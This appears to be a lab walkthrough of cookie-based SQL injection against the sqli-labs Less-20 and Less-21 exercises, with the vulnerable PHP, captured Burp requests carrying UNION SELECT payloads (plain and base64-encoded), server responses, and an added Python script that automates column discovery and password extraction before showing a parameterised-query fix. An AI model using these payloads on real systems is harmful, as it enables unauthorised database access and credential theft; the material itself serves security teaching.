Cookie injection will be familiar to most readers. A cookie is really no different from GET or POST: the three are grouped together as the "GPC" injection vectors, and the only thing that changes is how the parameter is submitted. Let's go straight to the source and follow the value from where it is received to where it enters the database.
********** A longer walkthrough this time **********
if(isset($_POST['uname']) && isset($_POST['passwd'])) {
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
    $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    $cookee = $row1['username'];
Look at the entry point first, the POST parameters. The code checks that uname and passwd are both present (isset, so it is a presence check, not an emptiness check), passes each through check_input(), and then drops the returned values straight into the concatenated SQL string. So the next question is what check_input() actually does.
function check_input($value) {
    if(!empty($value)) {
        $value = substr($value, 0, 20); // truncation (see comments)
    }
    if (get_magic_quotes_gpc()) { // Stripslashes if magic quotes enabled
        $value = stripslashes($value);
    }
    if (!ctype_digit($value)) { // Quote if not a number
        $value = "'" . mysql_real_escape_string($value) . "'";
    } else {
        $value = intval($value);
    }
    return $value;
}
check_input() is the lab's own sanitising function. It truncates the value to 20 characters, strips any magic-quotes backslashes, and then either wraps the value in quotes after mysql_real_escape_string() or, if it is purely numeric, casts it with intval(). It relies on the legacy mysql_* extension (removed in PHP 7) and on the connection charset being set correctly, but for this lesson treat it as safe.
That means we have to look for another entry point.
if(!isset($_POST['submit'])) {
    $cookee = $_COOKIE['uname'];
    $sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
Here is the second entry point: whenever the request does not carry the submit POST field, the code reads the uname cookie and puts it straight into the SQL string with no filtering at all. That is what we inject into. The cookie is presumably set by the login branch above from the username it fetched, so the normal flow is: log in once via POST, after which every following GET carries uname=admin.
Cookie injection can be done the way the online tutorials show, by setting the cookie from JavaScript (document.cookie in the browser console), or by "relay injection", where a small proxy script turns the cookie into a GET parameter so that ordinary GET-injection tools can be pointed at it. There are dedicated relay tools for that, but I couldn't be bothered to look for one, so let's just use Burp Suite.
Capture the request:
GET /sql/Less-20/index.php HTTP/1.1
Host: 192.168.150.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.129/sql/Less-20/
Cookie: uname=admin
Connection: keep-alive
Cache-Control: max-age=0
Then change the cookie value:
Cookie: uname=admin' and 1=2 union select 1,2,3#
Look at the returned page.
Three columns come back, and from here on it is ordinary injection. (The response below was captured with user() substituted into the second column, which is why the login name shows root@localhost.)
<center><br><br><br><img src="../images/Less-20.jpg" /><br><br><b><br><font color= "red" font size="4">YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0</font><br><font color= "cyan" font size="4">YOUR IP ADDRESS IS : 192.168.150.1</font><br><font color= "#FFFF00" font size = 4 >DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br><font color= "orange" font size = 5 >YOUR COOKIE : uname = admin' and 1=2 union select 1,user(),3# and expires: Sun 17 May 2015 - 14:09:57<br></font><font color= "pink" font size="5">Your Login name:root@localhost<br><font color= "grey" font size="5">Your Password:3</font></b><br>Your ID:1<center><form action="" method="post"><input type="submit" name="submit" value="Delete Your Cookie!" /></form></center><br><br><br><br> </body> </html>
Of course, cookies come in many forms. A cookie may be transformed before it reaches the query, base64 for example, so when building the payload we have to think about the value both before and after that transformation. (Base64 is an encoding, not encryption: it hides nothing from an attacker, it only changes how the payload has to be sent.)
GET /sql/Less-21/ HTTP/1.1
Host: 192.168.150.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: uname=YWRtaW4%3D
Connection: keep-alive
Cache-Control: max-age=0
This is the captured request.
The cookie value is YWRtaW4= (sent URL-encoded as YWRtaW4%3D, since = is a reserved character).
That is base64; decoding it gives
admin
So somewhere on the way through the application the cookie goes through an encode/decode step:
    setcookie('uname', base64_encode($row1['username']), time()+3600);
The cookie is base64-decoded before it goes into the SQL, so our injection string has to be base64-encoded in the same way:
GET /sql/Less-21/ HTTP/1.1
Host: 192.168.150.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: uname=YWRtaW4nKWFuZCAxPTIgdW5pb24gc2VsZWN0IDEsMiwzIw==
Connection: keep-alive
Cache-Control: max-age=0
The returned page shows the injection worked. (That cookie decodes to admin')and 1=2 union select 1,2,3#; the extra closing parenthesis implies this lesson wraps the value as username=('...'), unlike Less-20, which is why a plain admin' payload would not have closed the expression.)
<center><br><br><br><b><img src="../images/Less-21.jpg" /><br><br><b><br><font color= "red" font size="4">YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0</font><br><font color= "cyan" font size="4">YOUR IP ADDRESS IS : 192.168.150.1</font><br><font color= "#FFFF00" font size = 4 >DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br><font color= "orange" font size = 5 >YOUR COOKIE : uname = YWRtaW4nKWFuZCAxPTIgdW5pb24gc2VsZWN0IDEsMiwzIw== and expires: Sun 17 May 2015 - 14:16:28<br></font><font color= "pink" font size="5">Your Login name:2<br><font color= "grey" font size="5">Your Password:3</font></b><br>Your ID:1<center><form action="" method="post"><input type="submit" name="submit" value="Delete Your Cookie!" /></form></center><br><br><br><br>
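To make both cases on this page concrete, here is an added example (not code from the original post or from sqli-labs) that replays the Less-20 and Less-21 cookie handling against an in-memory SQLite table filled with constructed rows. It builds the query by string concatenation exactly as the PHP does, optionally base64-decoding the cookie first and optionally using the parenthesised wrapper the Less-21 payload implies; it finds the column count by growing a UNION SELECT, pulls a value out through a displayed column (a subquery stands in for MySQL's user(), which SQLite lacks), and then runs the same cookie through a parameterised query to show the fix. The three sample users, the table layout and the helper names are all assumptions for this demo. Payloads end the statement with `-- ` instead of `#` because SQLite does not understand MySQL's `#` comment (MySQL accepts both).

```python
import base64
import sqlite3

# Constructed stand-in for the lab's `users` table (assumption: three columns,
# which is what the successful `union select 1,2,3` on the page implies).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "dumb", "dumb"),
    (3, "angelina", "I-kill-you"),
]


def make_db():
    """Fresh in-memory SQLite database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def decode_cookie(cookie_value):
    """What Less-21's base64_decode() sees for a given raw cookie value."""
    return base64.b64decode(cookie_value).decode()


def build_cookie(payload, b64=False):
    """Encode a payload the way the client must send it for each lesson."""
    return base64.b64encode(payload.encode()).decode() if b64 else payload


def cookie_to_sql(cookie_value, b64=False, parenthesised=False):
    """Rebuild the SQL the way the lesson's PHP does: by concatenation.

    b64=True models Less-21 decoding the cookie before use.  parenthesised=True
    models a query of the form username=('$cookee'); that wrapper is inferred
    from the Less-21 payload on the page, which starts with admin') not admin'.
    """
    if b64:
        cookie_value = decode_cookie(cookie_value)
    if parenthesised:
        return f"SELECT * FROM users WHERE username=('{cookie_value}') LIMIT 0,1"
    return f"SELECT * FROM users WHERE username='{cookie_value}' LIMIT 0,1"


def run_vulnerable(conn, cookie_value, b64=False, parenthesised=False):
    """Execute the concatenated query; returns one row or None."""
    return conn.execute(cookie_to_sql(cookie_value, b64, parenthesised)).fetchone()


def _payload(expr_list, parenthesised):
    closer = "')" if parenthesised else "'"
    return f"admin{closer} and 1=2 union select {','.join(expr_list)}-- "


def find_column_count(conn, b64=False, parenthesised=False, limit=8):
    """Step 1 of 'ordinary injection': grow a UNION SELECT until no error."""
    for n in range(1, limit + 1):
        payload = _payload([str(i) for i in range(1, n + 1)], parenthesised)
        try:
            run_vulnerable(conn, build_cookie(payload, b64), b64, parenthesised)
            return n
        except sqlite3.OperationalError:  # column-count mismatch in the UNION
            continue
    return None


def extract(conn, expr, column=2, b64=False, parenthesised=False):
    """Step 2: place an expression in a displayed column, like user() on the page."""
    n = find_column_count(conn, b64, parenthesised)
    cols = [str(i) for i in range(1, n + 1)]
    cols[column - 1] = expr
    payload = _payload(cols, parenthesised)
    row = run_vulnerable(conn, build_cookie(payload, b64), b64, parenthesised)
    return row[column - 1]


def run_hardened(conn, cookie_value, b64=False):
    """The fix: decode if needed, then bind the cookie as a query parameter."""
    if b64:
        cookie_value = decode_cookie(cookie_value)
    return conn.execute(
        "SELECT * FROM users WHERE username=? LIMIT 0,1", (cookie_value,)
    ).fetchone()


if __name__ == "__main__":
    conn = make_db()
    print("Less-20 columns:", find_column_count(conn))
    print("Less-21 columns:", find_column_count(conn, b64=True, parenthesised=True))
    print("admin password via cookie:",
          extract(conn, "(select password from users where username='admin')"))
    evil = build_cookie("admin' and 1=2 union select 1,2,3-- ")
    print("hardened query with the payload:", run_hardened(conn, evil))
```

When pasting the encoded cookie into Burp, remember that a trailing `=` in base64 output is sent URL-encoded as `%3D` by the browser, as in the captured request above; the server decodes it either way.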
That's it for cookie injection for now; there are all sorts of fancier injection variants still to come, so take them one at a time.